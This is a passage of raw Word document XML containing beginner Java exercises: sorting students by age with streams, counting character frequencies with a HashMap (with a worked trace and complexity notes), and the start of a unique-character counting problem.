        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43768987"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ls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586E592"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It's impossible to reach the last stair."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321F09A"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8180044" w14:textId="77777777"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C595BC4" w14:textId="4698F43A" w:rsidR="005E6BE8" w:rsidRPr="00CE4B95"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164B26B5" w14:textId="77777777" w:rsidR="005E6BE8" w:rsidRPr="00CE4B95" w:rsidRDefault="005E6BE8" w:rsidP="005E6BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A0749F" w14:textId="408BE824" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="_Toc196307845"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00323041" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Sort Student data based on age using java 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
    </w:p>
    <w:p w14:paraId="04A6ED1A" w14:textId="7149379D" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="008240D3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00E83029" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>How will you sort the Student data based on their Age?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2C34F" w14:textId="3C58FEBA" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C6BD0B"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p>
    <w:p w14:paraId="1D4F0D57"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF7AE0"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ollectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D9E407"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0DB5BD"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ude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B01DB4B"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51469899"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5902F2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2BDD5"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C94588"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uden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C7D523E"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0EC8D437"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ag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ge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49820497"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BF7010E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF034A6"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Getter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320B7D8"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get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939B6E8"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062AA92B"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DA883A8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF7DE0"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get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71CDCE9"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495384A6"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414C260"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71B032"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63814767"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to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19D2111"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Student{nam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ag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g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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A8389"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264EA13"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4474A36F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AEAC92"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udentSor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D1F2F4F"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066D479"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ing a list of students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1F994"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udent</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student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p>
    <w:p w14:paraId="35007184"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uden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li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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FAB1E"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uden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Bo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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2499C2"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uden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Charli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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502B64B1"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uden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Davi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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2C380"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9D2E03C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F15CB9"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orting students based on age using stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F19DF"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udent</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sortedStudent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uden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p>
    <w:p w14:paraId="761052BB"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orted</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omparat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mparingIn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ude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Age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B42BE27"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llec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ollecto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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A85BF7F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7810698A"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inting the sorted student data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ADBD75"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sortedStuden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orEach</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p>
    <w:p w14:paraId="2C4A01C1" w14:textId="77777777"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1CA7AF6" w14:textId="02BA1FA6" w:rsidR="002C01D9" w:rsidRPr="00CE4B95"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47F38555" w14:textId="77777777" w:rsidR="002C01D9" w:rsidRPr="00CE4B95" w:rsidRDefault="002C01D9" w:rsidP="002C01D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206B5E68" w14:textId="720A65E4" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="366" w:name="_Toc196307846"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00A51B3A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain logic </w:t>
      </w:r>
      <w:r w:rsidR="007968C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00A51B3A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> frequency of each character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="366"/>
    </w:p>
    <w:p w14:paraId="0247C441" w14:textId="37743F68" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDF02F5" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">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eps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258137F7" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>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erate through each character of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694CB2BA" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="00E732CB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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o through the string one character at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E718C05" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>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a data structure to store the frequency count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25157EB9" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="00E732CB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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good choice is a HashMap where the key is the character and the value is the frequency count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB500E" w14:textId="41249C42" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>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heck if the character is already present in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B028C" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="00E732CB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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character is already in the map, increment its value by 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DB06B" w14:textId="5677E0C1" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="00E732CB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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character is not present, add it to the map with a value of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7435C093" w14:textId="1A11B2C2" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>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utput the frequency count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29C116" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="00E732CB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>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ce the iteration is complete, the map will contain each unique character as the key and its frequency as the value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E1423B" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">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Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB6B816"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put String:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0F7FD"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hello"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F67023"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eration 1: Encounter character 'h'. It's not in the map, so add it with a count of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738D6A3"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eration 2: Encounter character 'e'. It's not in the map, so add it with a count of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F2906"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eration 3: Encounter character 'l'. It's not in the map, so add it with a count of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31257DAF"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eration 4: Encounter another character 'l'. It is already in the map, so increment the count to 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06536663"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eration 5: Encounter character 'o'. It's not in the map, so add it with a count of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488BA634"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nal frequency count in the map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073E23F"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 -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB5E0E"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 -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771430C0"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 -&gt; 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F24A4"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 -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604DA12F"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de Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F8491A" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D190C50" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA36CD" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1529DD" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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haracterFrequency</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CF409DC" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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92AF918" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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inpu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hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2BBB9" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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0E089648" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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e a map to store frequency of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A79F51C" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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Charac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frequency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p>
    <w:p w14:paraId="33BD32C7" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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7C51BCA7" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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terate through each character of the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF53FE" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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n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CharArr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50624E4" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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f the character is already in the map, increment its frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C23510" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            frequency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requency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OrDefaul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207A98C8" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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A43EEB3" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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3B290BCA" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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int out the frequency of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B61827" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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Entry</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Charac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entr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requency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ntryS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4C96CDA" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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nt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Ke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g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nt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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61DB7C" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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B2DFA4B" w14:textId="77777777" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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F8AA05A" w14:textId="73D989DE" w:rsidR="007D4C54" w:rsidRPr="00CE4B95"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7A56CC61" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">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 of Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBA3DD"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put.toCharArray(): Converts the string into a character array so we can iterate through each character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA5496"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requencyMap.put(c, frequencyMap.getOrDefault(c, 0) + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8BEFB5"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requencyMap.getOrDefault(c, 0) retrieves the current count of the character c from the map, or 0 if the character is not present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977DE33"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e add 1 to this value and update the map with the new count for that character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669436A6"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Map.Entry&lt;Character, Integer&gt; entry : frequencyMap.entrySet()): Iterates over each entry in the map and prints the character and its frequency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F015C43"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F51779"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 -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36926D33"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 -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A741B1D"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 -&gt; 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340FC5B"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 -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DFA37" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">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ime Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14CA93"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ime complexity for iteration: The time complexity for iterating through the string is O(n)O(n)O(n), where n is the length of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC44E4"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ime complexity for map operations: Since the map operations (put and get) have an average time complexity of O(1)O(1)O(1), the overall time complexity is O(n)O(n)O(n).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBB059" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">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pace Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A093826" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">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ace complexity: The space complexity is O(k)O(k)O(k), where k is the number of unique characters in the string. This is because we're storing the frequency of each unique character in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF28A3" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BD2A10" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1640B1FB" w14:textId="2AEDCE36" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="367" w:name="_Toc196307847"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="009112EA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count of unique character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="367"/>
    </w:p>
    <w:p w14:paraId="4AF89EC9" w14:textId="427B6EA3" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="004C6BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="004C6BE3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a code to print the count of unique characters from the String str = “Siddhant Patni”?</w:t>
      </w:r>
    </w:p>
